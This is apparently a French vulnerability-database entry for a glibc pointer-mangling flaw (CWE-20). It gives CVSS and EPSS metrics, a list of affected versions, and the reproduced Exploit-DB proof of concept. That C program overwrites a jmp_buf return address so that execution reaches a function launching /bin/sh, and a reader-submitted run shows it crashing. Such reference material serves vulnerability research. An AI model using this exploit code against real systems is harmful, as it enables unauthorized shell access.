Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5.1 |
|
AV:N/AC:H/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 28657
Date de publication : 2013-09-29 22h00 +00:00
Auteur : Hector Marco & Ismael Ripoll
EDB Vérifié : No
/*
*
* Exploit-DB Note: Reportedly does not work. See output at the bottom of the entry.
*
* $FILE: bug-mangle.c
*
* Comment: Proof of concept
*
* $VERSION$
*
* Author: Hector Marco <
[email protected]>
* Ismael Ripoll <
[email protected]>
*
* $LICENSE:
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#include <stdio.h>
#include <setjmp.h>
#include <stdint.h>
#include <limits.h>
#ifdef __i386__
#define ROTATE 0x9
#define PC_ENV_OFFSET 0x14
#elif __x86_64__
#define ROTATE 0x11
#define PC_ENV_OFFSET 0x38
#else
#error The exploit does not support this architecture
#endif
unsigned long rol(uintptr_t value) {
return (value << ROTATE) | (value >> (__WORDSIZE - ROTATE));
}
int hacked(){
printf("[+] hacked !!\n");
system("/bin/sh");
}
int main(void){
jmp_buf env;
uintptr_t *ptr_ret_env = (uintptr_t*) (((uintptr_t) env) + PC_ENV_OFFSET);
printf("[+] Exploiting ...\n");
if(setjmp(env) == 1){
printf("[-] Exploit failed.\n");
return 0;
}
/*Overwrie env return address */
*ptr_ret_env = rol((uintptr_t)hacked);
longjmp(env, 1);
printf("[-] Exploit failed.\n");
return 0;
}
####################################################################################################################
#
# Reader submitted results
/*
[522] user@his-system ~ $ ./POC
[+] Exploiting ...
Segmentation fault
[523] user@his-system ~ $ ldd POC
linux-vdso.so.1 => (0x00007fffab5fd000)
libc.so.6 => /lib64/libc.so.6 (0x0000003269800000)
/lib64/ld-linux-x86-64.so.2 (0x0000003269400000)
[525] user@his-system ~ $ uname -a
Linux his-sysrtem.domain.LOCAL 2.6.18-348.12.1.el5xen #1 SMP Mon Jul 1 17:58:32 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux
[526] user@his-system ~ $
[526] user@his-system ~ $ grep vsys /proc/self/maps
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vsyscall]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vsyscall]
*/
Products Mentioned
Configuraton 0
Gnu>>Glibc >> Version To (including) 2.17
Gnu>>Glibc >> Version 2.0
Gnu>>Glibc >> Version 2.0.1
Gnu>>Glibc >> Version 2.0.2
Gnu>>Glibc >> Version 2.0.3
Gnu>>Glibc >> Version 2.0.4
Gnu>>Glibc >> Version 2.0.5
Gnu>>Glibc >> Version 2.0.6
Gnu>>Glibc >> Version 2.1
Gnu>>Glibc >> Version 2.1.1
Gnu>>Glibc >> Version 2.1.1.6
Gnu>>Glibc >> Version 2.1.2
Gnu>>Glibc >> Version 2.1.3
Gnu>>Glibc >> Version 2.1.9
Gnu>>Glibc >> Version 2.4
Gnu>>Glibc >> Version 2.10.1
Gnu>>Glibc >> Version 2.11
Gnu>>Glibc >> Version 2.11.1
Gnu>>Glibc >> Version 2.11.2
Gnu>>Glibc >> Version 2.11.3
Gnu>>Glibc >> Version 2.12.1
Gnu>>Glibc >> Version 2.12.2
Gnu>>Glibc >> Version 2.13
Gnu>>Glibc >> Version 2.14
Gnu>>Glibc >> Version 2.14.1
Gnu>>Glibc >> Version 2.15
Gnu>>Glibc >> Version 2.16
Configuraton 0
Gnu>>Eglibc >> Version *
Références